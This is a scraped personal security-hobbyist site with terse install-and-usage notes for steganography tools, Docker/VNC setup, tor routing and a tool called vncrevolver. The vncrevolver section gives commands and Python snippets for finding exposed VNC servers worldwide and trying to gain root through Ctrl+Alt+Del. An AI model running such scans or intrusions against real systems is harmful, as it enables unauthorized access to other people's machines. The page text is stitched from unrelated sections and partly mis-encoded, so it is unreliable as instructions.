+java -jar StegoShare.jar
Is a tool to send steganographed text messages to another computer over the network. The receiver must make a traceroute to the sender using the mtr program (and pressing d once to switch the display mode to the continuous graph). +This tool, the sender, creates several fake hops and makes them answer the ICMP packets (or not) to write the letters one by one on the mtr client screen.
It can print upper and lower-case letters.
It can print in normal or color-inverse mode.
It can loop forever.
It should work on your own localhost computer, on your LAN and over the Internet.
Is uses the Sinclair ZX Spectrum (1982) font.
You can select the TTL value on demand and therefore 'move' the text up and down the mtr graph.
apt install git mtr python3 python-scapy
+git clone https://github.com/stratosphereips/steganoroute.git
+cd ./steganoroute
+iptables -I INPUT -p icmp --icmp-type 8 -j DROP
+python3 ./steganoroute.py -i lo -m "MATRIX has You!" -l
+mtr -t yourlocalLANip
*MTR command used to list the message
emerge mtr
+emerge python
+emerge scapy
+git clone https://github.com/stratosphereips/steganoroute.git
+cd ./steganoroute
+iptables -I INPUT -p icmp --icmp-type 8 -j DROP
+python3 ./steganoroute.py -i lo -m "MATRIX has You!" -l
+mtr -t yourlocalLANip
*MTR command used to list the message
A lightweight tool that uses whitespace and tabs to hide information inside text files. Unlike other steganographic tools, snow does not rely on binary formats to encode secret data. This can be incredibly useful in cases where it is not possible to share large binary files.
Produces small files +Output text can be used on any program that accepts plain text
apt install stegsnow
+stegsnow -C -m "Encrypted Message Here" -p "angrypassword" infile outfile
+stegsnow -C -p "angrypassword" outfile
wget https://darkside.com.au/snow/snow.zip
+unzip snow.zip
+cd snow
+make
+cp snow /bin/
+snow -C -m "Encrypted Message Here" -p "angrypassword" infile outfile
+snow -C -p "angrypassword" outfile
Quick and easy to use
Uses checksums to verify the integrity of data
apt install steghide
+cd steghide
+steghide embed -ef topsecretfile.txt -cf photo.jpg -sf photoX.jpg
+steghide extract โsf photoX.jpg
wget https://ufpr.dl.sourceforge.net/project/steghide/steghide/0.5.1/steghide-0.5.1.zip
+cd steghide
+./configure
+make
+make check
+make install
+steghide embed -ef topsecretfile.txt -cf photo.jpg -sf photoX.jpg
+steghide extract โsf photoX.jpg
If you want run it in reboot:
Have a nice day! :)
docker run -it IMAGE_ID_HERE /bin/bash
docker start $(docker ps -a -q --filter "status=exited")
docker start -a -i 'docker ps -q -l'
docker images
docker ps -a
docker exec -it CONTAINER_ID_HERE /bin/bash
apt install xfce-desktop xorg -y
passwd
iptables -A INPUT -i docker0 -j ACCEPT
apt update && apt upgrade && apt install novnc x11vnc tigervnc-standalone-server dbus-x11 python-py python3-pip -y
user > pip install numpy
+user > pip3 install numpy
dbus-launch
vncserver
/usr/share/novnc/utils/novnc_proxy --listen 8081 --vnc localhost:5900
CONTAINER_IP:8081/vnc.html
echo $(hostname -I | cut -d\ -f1) $(hostname) | sudo tee -a /etc/hosts
I needed a cool portfolio... so i created [this]. +Well. My hacking spirit ever want learn more; then i use threejs and reactjs to create a interative portfolio (check [here]). +But it's not sufficient for me. +After a few months of hard work i finished one of my best creations: A interactive [OpenBSD portfolio] with another two websites(listed above) inside.
apt install novnc psmisc x11vnc tigervnc-standalone-server xterm terminator wget dbus-x11 python-py python3-pip xfce4 xorg -y
tigervncserver -geometry 1366x768 -xstartup /usr/bin/terminator
/usr/share/novnc/utils/launch.sh --listen 8080 --vnc localhost:5901
http://SERVERIP:8080/vnc.html
fuser -k 8080/tcp
Debian: |
+apt update && apt upgrade && apt install sshpass pssh torsocks -y
Fedora:
dnf update && dnf upgrade && dnf install sshpass pssh tor torsocks -y
Gentoo:
emerge sshpass pssh tor torsocks
systemctl enable tor
+systemctl start tor
rc-service tor enable
+rc-service tor start
torify sshpass -p "segfault" pssh -A -i -H "root@lsd.segfault.net:22" uname -a
Go to Segfault interactive shell [here]
ssh@lsd.segfault.net
ssh@adm.segfault.net
Knowledge is power. Use it.
Have a nice day! :)
๐ง๐ท Para o tutorial em portuguรชs clique [aqui]
DEBIAN:
apt update && apt upgrade && apt install tor torsocks -y
GENTOO:
emerge tor torsocks
ARCH:
pacman tor torsocks -Syu
OPENSUSE:
zypper install tor torsocks -y
Clone the repo and open the torando.sh and change USERAQUI for your username. +Do the same on toroff.sh
git clone https://github.com/cristiancmoises/torando
+cd torando
+chmod +x *
+nano torando.sh
nano /etc/tor/torrc
Then paste in the end:
VirtualAddrNetwork 10.192.0.0/10
+AutomapHostsOnResolve 1
+TransPort 9040
+DNSPort 53
nano /etc/resolv.conf
chattr +i /etc/resolv.conf
nameserver 127.0.0.1
Go to the firefox and digit about:config then press enter.
about:config
OK, Now paste the command and search, then change the value:
network.proxy.socks_remote_dns |True
+browser.safebrowsing.enabled |True
+browser.safebrowsing.malware.enabled |False
cd torando
+ ./torando.sh
cd torando
+./toroff.sh
nano .bashrc
alias torando="./torando.sh"
+ alias toroff="./offtor.sh"
Dependencies
]Install
]Features
]Usage
] pip install pydantic
+ pip install asyncvnc
+ pip install aiohttp
git clone https://github.com/cristiancmoises/vncrevolver
+cd vncrevolver
| Some Features | +|------------------------------------------------------------------------------------| +| ๐ Search for many open Vnc Servers around the world | +| ๐ Filter by country | +| ๐ข List more than one | +| ๐ฅ๏ธ List by Client name | +| โ Checks them for vulnerabilities by rebooting the machine via Ctrl+ALT+DEL, obtaining root access through the operating system bootloader easyly. |
python -m vncrevolver
python -m vncrevolver --clientname ubuntu --count 10
python -m vncrevolver --clientname ubuntu --count 10 --check_crt_alt_del
python -m vncrevolver --check_crt_alt_del 123.12.1.23:5901
START ME UP!
$ python -m vncrevolver --help
+
+usage: vncrevolver [-h] [--clientname CLIENTNAME] [--country COUNTRY] [--asn ASN] [--count COUNT] [--check_crt_alt_del [CHECK_CRT_ALT_DEL]] [--show_failed] [--screen_delay SCREEN_DELAY]
+
+optional arguments:
+-h, --help show this help message and exit
+--clientname CLIENTNAME
+ Filter by client name, note that it is case-sensitive!
+--country COUNTRY Filter by ISO 3166-1 alpha-2 country code
+--asn ASN Filter by ASN
+--count COUNT Number of VNCs to find
+--check_crt_alt_del [CHECK_CRT_ALT_DEL]
+ If you specify this parameter without a value, only those VNCs from the search that pass the ctrl_alt_del check will be returned. If a value is passed, it must be a VNC
+ address that will be checked against ctrl_alt_del.
+--show_failed Return VNCs that failed the ctrl_alt_del check
+--screen_delay SCREEN_DELAY
+ Delay between taking two screenshots in milliseconds
Use filters:
from typing import List
+from vncrevolver.search import VNC, search_filter
+
+hosts: List[VNC] = await search_filter(clientname='ubuntu')
+for vnc in hosts:
+print(vnc.ip, vnc,port)
Random Search
from vncrevolver.search import VNC, search_random
+vnc: VNC = await search_random()
+print(vnc.ip, vnc.port)
Ctrl + ALT + DEL - CHECK UP!
from vncrevolver.search import VNC, search_random
+from vncrevolver.vnc import check_crt_alt_del
+vnc: VNC = await search_random()
+print(await check_crt_alt_del(vnc.ip, vnc.port))
This is the personal website of Cristian Cezar Moisรฉs. I am a student. (Pronouns: he, him, his).
Learning about cybersec,infosec and hacking.Information Security Graduate[Ftec]. My research focused on the Linux Servers Security.I'm a free software enthusiast.
I love code and unify projects like threejs + react Check my awesome interactive portfolio [here]. Outside of work, I'm a computerphile โ I enjoy learning about and using programming languages .This site was written in the LISP dialect Scheme (GNU Guile, version 3.0.9) and built with the Haunt library (version 0.2.6) on Sun 18 Feb 2024 03:23:30 AM -03. The source code can be found on [GitHub]. Check my YouTube channel [SecurityOps].
A web operating system for you!
Just click [here] and visit now.
For the android app click[here]
All files are running on your local computer. Convert, play music, and more with this. +FasterOS is a web operating system created for help users in daily tasks and for help security enthusiasts and students.
-->--<--
-->--<--
-->--<--